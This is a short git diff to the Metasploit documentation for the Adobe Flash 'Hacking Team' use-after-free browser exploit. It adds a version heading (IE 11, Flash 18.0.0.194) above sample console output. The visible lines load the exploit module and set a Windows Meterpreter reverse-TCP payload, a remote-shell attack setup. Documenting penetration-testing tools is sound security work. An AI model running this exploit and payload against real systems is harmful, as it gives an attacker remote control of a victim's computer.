diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index ec813bc6ea..b1d28612e2 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -18,6 +18,8 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability, ## Sample Output +### IE 11 and Flash 18.0.0.194 + ``` msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf msf exploit(adobe_flash_hacking_team_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp